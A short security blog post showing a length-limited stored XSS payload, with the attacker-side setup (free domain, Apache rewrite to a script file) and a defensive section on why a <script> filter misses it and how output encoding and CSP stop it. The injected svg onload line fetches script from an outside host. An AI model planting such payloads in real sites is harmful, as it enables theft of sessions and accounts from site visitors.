Tuesday, January 5, 2016

xss-script injection if size matters...



I wanted to demonstrate a stored XSS vulnerability where the vulnerable field had limited space.
(In this case <script> tags were filtered, so I had to use jQuery.)

-1-
Registered a .cf domain (4-character domains are free) at http://www.freenom.com/

-2-
Set up an Apache server and pointed whw3.cf to it.

-3-
Configured Apache to redirect / to my JavaScript file.
.htaccess rewrite:

Options +FollowSymLinks
RewriteEngine on
RewriteCond %{REQUEST_URI} !^/a.js
RewriteRule ^(.*)$ http://%{HTTP_HOST}/a.js [R=301,L]

-4-
Injected the following:
<svg/onload=$.getScript('http:/whw3.cf')></svg>
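
Why filtering <script> tags did not stop the value from step 4, and what does: an added example, not code from the original post. The regex form of the filter and all function names are assumptions; the sample value is the one shown above.

```javascript
// Sample input: the stored value from step 4 of the post.
const STORED_VALUE = "<svg/onload=$.getScript('http:/whw3.cf')></svg>";

// Assumed shape of the filter the post describes: removes <script> elements
// and any stray opening/closing script tags, nothing else.
function stripScriptTags(input) {
  return input
    .replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, "")
    .replace(/<\/?script\b[^>]*>/gi, "");
}

// Lists inline event-handler attributes (on*=) found inside real tags.
// The separator before the attribute may be whitespace or "/" (as in <svg/onload=...>).
function findEventHandlers(input) {
  const re = /<[a-z][^>]*?[\s\/](on[a-z]+)\s*=/gi;
  return [...input.matchAll(re)].map((m) => m[1].toLowerCase());
}

// Output encoding for HTML element content and quoted attribute values.
// Applied at render time, it turns stored markup into inert text.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical render step: the stored value is placed into a table cell.
function renderCell(value, encode) {
  return `<td class="comment">${encode(value)}</td>`;
}

// Weak path: the blacklist leaves the value untouched, handler still present.
const filtered = stripScriptTags(STORED_VALUE);
console.log("after <script> filter :", filtered);
console.log("handlers still active :", findEventHandlers(renderCell(filtered, (v) => v)));

// Hardened path: encode on output, no tag survives, so no handler can fire.
const encoded = renderCell(STORED_VALUE, escapeHtml);
console.log("after output encoding :", encoded);
console.log("handlers still active :", findEventHandlers(encoded));
```

A Content-Security-Policy whose script-src does not allow 'unsafe-inline' additionally blocks inline event handlers such as this onload.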